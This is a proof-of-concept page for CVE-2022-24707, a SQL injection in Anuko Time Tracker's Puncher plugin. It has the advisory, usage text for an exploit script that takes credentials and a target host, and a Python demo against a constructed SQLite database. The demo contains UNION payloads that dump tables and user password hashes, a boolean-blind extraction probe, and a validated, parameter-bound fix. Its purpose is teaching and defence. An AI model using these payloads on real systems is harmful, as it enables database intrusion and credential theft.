
CVE-2022-24707 PoC — SQL injection in anuko timetracker

Associated Vulnerability
Title: SQL injection in anuko timetracker (CVE-2022-24707)
Description: Anuko Time Tracker is an open source, web-based time tracking application written in PHP. UNION SQL injection and time-based blind injection vulnerabilities existed in the Time Tracker Puncher plugin in versions of anuko timetracker prior to 1.20.0.5642. This happened because the Puncher plugin reused code from other places and relied on an unsanitized date parameter in POST requests. Because the parameter was not checked, it was possible to craft POST requests carrying malicious SQL for the Time Tracker database. This issue has been resolved in version 1.20.0.5642. Users unable to upgrade are advised to add their own checks to input.
Description
PoC of CVE-2022-24707
Readme
# PoC for CVE-2022-24707

SQL injection vulnerability in the Puncher plugin. A POST request can be crafted to exploit the injection and leak database contents. This was tested on [Anuko Time Tracker 1.20.0.5640](https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d).

```
python3 exploit.py --help
usage: exploit.py [-h] --username USERNAME --password PASSWORD --host HOST [--sqli SQLI]

optional arguments:
  -h, --help           show this help message and exit
  --username USERNAME  Anuko Timetracker username
  --password PASSWORD  Anuko Timetracker password
  --host HOST          e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000
  --sqli SQLI          SQL query to run. Defaults to getting all tables
```
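The bug class described above, reproduced as an added example that is neither Time Tracker's code nor the PoC author's `exploit.py`. It runs against an in-memory SQLite database; the table names, columns and rows are constructed stand-ins, and `vulnerable_lookup`/`hardened_lookup` are assumed shapes of the Puncher query. The only fact taken from the advisory is that a POST `date` parameter reached the SQL statement unchecked. The UNION payload mirrors the PoC's default "get all tables" behaviour (against MySQL the source would be `information_schema.tables` rather than `sqlite_master`); the blind probe shows why extraction still works when nothing is echoed. SQLite has no `SLEEP()`, so the advisory's time-based variant is not reproduced here.

```python
"""Added example: an unsanitized `date` parameter concatenated into SQL,
the UNION leak it enables, a boolean-blind probe, and the hardened form.
Schema, data and function names are constructed for this example."""
import re
import sqlite3

# Accept only an ISO calendar date; this is the "add your own checks to input"
# advice from the advisory, applied before the value is ever used in SQL.
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def build_db():
    """Constructed stand-in for the Time Tracker schema (not the real one)."""
    con = sqlite3.connect(":memory:")
    cur = con.cursor()
    cur.execute("CREATE TABLE tt_log (id INTEGER, date TEXT, duration TEXT)")
    cur.execute("CREATE TABLE tt_users (id INTEGER, login TEXT, password TEXT)")
    cur.executemany("INSERT INTO tt_log VALUES (?, ?, ?)",
                    [(1, "2022-02-21", "01:00"), (2, "2022-02-22", "02:30")])
    cur.executemany("INSERT INTO tt_users VALUES (?, ?, ?)",
                    [(1, "admin", "hash_of_admin"), (2, "bob", "hash_of_bob")])
    con.commit()
    return con


def vulnerable_lookup(con, date):
    """Mimics the bug: the request parameter is spliced into the statement."""
    sql = f"SELECT date, duration FROM tt_log WHERE date = '{date}'"
    return con.execute(sql).fetchall()


def is_valid_date(value):
    return bool(DATE_RE.match(value))


def hardened_lookup(con, date):
    """Fix: validate the parameter's shape, then bind it instead of concatenating."""
    if not is_valid_date(date):
        raise ValueError("date must be YYYY-MM-DD")
    return con.execute("SELECT date, duration FROM tt_log WHERE date = ?",
                       (date,)).fetchall()


# UNION payloads: close the quote, append a SELECT with the same column count
# (two), and comment out the trailing quote the original query appends.
LEAK_TABLES = "' UNION SELECT name, type FROM sqlite_master WHERE type='table' -- "
LEAK_USERS = "' UNION SELECT login, password FROM tt_users -- "


def blind_char(con, login, pos, guess):
    """Boolean-blind probe: the injected OR makes the WHERE true (rows come
    back) only when character `pos` of the target's password equals `guess`."""
    payload = (f"' OR (SELECT substr(password, {pos}, 1) FROM tt_users "
               f"WHERE login = '{login}') = '{guess}' -- ")
    return len(vulnerable_lookup(con, payload)) > 0


def demo():
    """Returns (leaked table names, leaked user rows, hardened-rejected?)."""
    con = build_db()
    tables = sorted(name for name, _ in vulnerable_lookup(con, LEAK_TABLES))
    users = sorted(vulnerable_lookup(con, LEAK_USERS))
    try:
        hardened_lookup(con, LEAK_USERS)
        blocked = False
    except ValueError:
        blocked = True
    return tables, users, blocked


if __name__ == "__main__":
    print(demo())
```

The regex check is deliberately a whitelist on shape rather than a blacklist of quote characters; together with parameter binding it closes both the UNION and the blind variants, because the value never becomes part of the statement text.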

![cve gif](./CVE-2022-24707.gif)